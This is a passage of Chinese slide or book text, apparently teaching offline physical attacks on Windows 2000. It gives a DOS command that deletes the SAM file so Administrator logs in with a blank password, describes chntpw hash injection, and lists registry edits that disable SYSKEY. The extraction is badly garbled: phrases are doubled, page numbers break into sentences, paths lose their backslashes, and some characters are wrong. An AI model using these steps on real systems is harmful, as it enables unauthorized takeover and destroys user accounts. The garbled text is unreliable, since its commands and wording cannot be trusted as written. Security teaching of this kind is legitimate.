53、制到可移动媒体或网络共享中网络共享中首先介绍一些经典的离线攻击技术，然后分析这些攻击首先介绍一些经典的离线攻击技术，然后分析这些攻击对对EFS潜在的影响。最后，讨论潜在的影响。最后，讨论EFS攻击的一个例子，它攻击的一个例子，它不需要在离线状态下访问系统不需要在离线状态下访问系统通过删除通过删除SAM废除废除Administrator密密码码通过在系统处于离线状态时删除通过在系统处于离线状态时删除SAM文件，然后就可以文件，然后就可以在系统重新启动后以空密码登录在系统重新启动后以空密码登录Administrator账户。账户。这种方法同时也删除了目标系统上所有现有的用户账户，这种方法同时也删除

54、了目标系统上所有现有的用户账户，但与磁盘上的重要数据相比，攻击者并不考虑这一点但与磁盘上的重要数据相比，攻击者并不考虑这一点这种攻击有多种实现方式，但最直接的方法是制作一张这种攻击有多种实现方式，但最直接的方法是制作一张可 引 导 的可 引 导 的 D O S 系 统 软 盘 ， 并 将系 统 软 盘 ， 并 将 S y s i n t e r n a l 的的ntfsdospro复制到软盘上。然后这张软盘就可以用来将复制到软盘上。然后这张软盘就可以用来将目标系统引导到目标系统引导到DOS通过删除通过删除SAM废除废除Administrator密密码码如果目标系统使用如果目标系统使用FAT或或

55、FAT32，那么只需输入以下命，那么只需输入以下命令就可以删除令就可以删除SAM文件：文件： A:del c:winntsystem32configsam如果目标系统使用如果目标系统使用NTFS文件系统，那么可以使用文件系统，那么可以使用ntfsdospro将将NTFS卷装载到卷装载到DOS中，然后使用相同的中，然后使用相同的命令来删除命令来删除SAM通过删除通过删除SAM废除废除Administrator密密码码当系统稍后重新启动时，当系统稍后重新启动时，Windows 2000将重新创立一将重新创立一个默认的个默认的SAM文件，它含有文件，它含有Administrator账户，而且账户，而

56、且密码为空。只需使用这个账户和密码登录，就可以获得密码为空。只需使用这个账户和密码登录，就可以获得对系统的全面控制对系统的全面控制这里需要注意的是，删除这里需要注意的是，删除SAM并不会影响并不会影响Windows 2000域控制器，因为它们没有把密码散列保存在域控制器，因为它们没有把密码散列保存在SAM中。然而，中。然而，Grace和和Bartlett的文章指出了一种方法，通的文章指出了一种方法，通过在域控制器上安装另一份过在域控制器上安装另一份Windows 2000，就可以获，就可以获得根本相同的效果得根本相同的效果通过使用通过使用chntpw对对SAM进行散列注进行散列注入入如果你希望

57、使用更为成熟的物理攻击方法，不想如果你希望使用更为成熟的物理攻击方法，不想破坏掉系统中全部的账户，可以使用一张破坏掉系统中全部的账户，可以使用一张Linux引导软盘和引导软盘和Petter Nordahl-Hagen的的chntpw，在离线状态将密码散列注入到在离线状态将密码散列注入到SAM中中即使在应用了即使在应用了SYSKEY时，或即使选择了用密码时，或即使选择了用密码来保护来保护SYSKEY或将它保存在软盘上的选项，注或将它保存在软盘上的选项，注入仍然能够奏效！入仍然能够奏效！通过使用通过使用chntpw对对SAM进行散列注进行散列注入入Petter说明了如何将说明了如何将SYSKEY关

58、闭。更糟的是，他关闭。更糟的是，他发现攻击者并不需要这样做发现攻击者并不需要这样做只需将旧的、未只需将旧的、未经经SYSKEY处理的散列直接注入到处理的散列直接注入到SAM中，在重中，在重新启动后，它就会自动被转换为新启动后，它就会自动被转换为SYSKEY散列散列关闭关闭SYSKEY的方法的方法1.将将HKLMSystemCurrentControlSetControlLsaSecureBoot设置为设置为0以禁用以禁用SYSKEY(这个键的可能取值为：这个键的可能取值为：0禁用；禁用；1不受保护的密钥保存在注册表中；不受保护的密钥保存在注册表中；2密钥保存在注册表中，受密码密钥保存在注册表中

59、，受密码保护；保护；3密钥保存在软盘上密钥保存在软盘上)2. 将二进制结构将二进制结构HKLMSAMDomainsAccountF中的一个特殊标志中的一个特殊标志位修改为以前位修改为以前SecureBoot的相同模式。在系统处于运行状态时，这个的相同模式。在系统处于运行状态时，这个主键是不能访问的主键是不能访问的3.在在Windows 2000中，中，HKLMsecurityPolicyPolSecretEncryptionKey 主主键也需要被修改为与以前的两个主键相同的值键也需要被修改为与以前的两个主键相同的值通过使用通过使用chntpw对对SAM进行散列注进行散列注入入根据根据Pette

60、r的说法，在的说法，在NT 4 SP6之前的系统上之前的系统上只修改前两个值中的一个会导致在完全引导之后出只修改前两个值中的一个会导致在完全引导之后出现一个警告，指出现一个警告，指出SAM和系统设置之间的不一致和系统设置之间的不一致性，性，SYSKEY会被重新启用。而在会被重新启用。而在Windows 2000上，在重新启动之后，这上，在重新启动之后，这3个键值之间的不个键值之间的不一致似乎直接被重置为最可能的值一致似乎直接被重置为最可能的值目目 录录IIS5的平安的平安终端效劳器平安终端效劳器平安Microsoft Internet 客户端客户端的平安的平安物理攻击物理攻击拒绝效劳攻击拒绝效劳攻击平安功能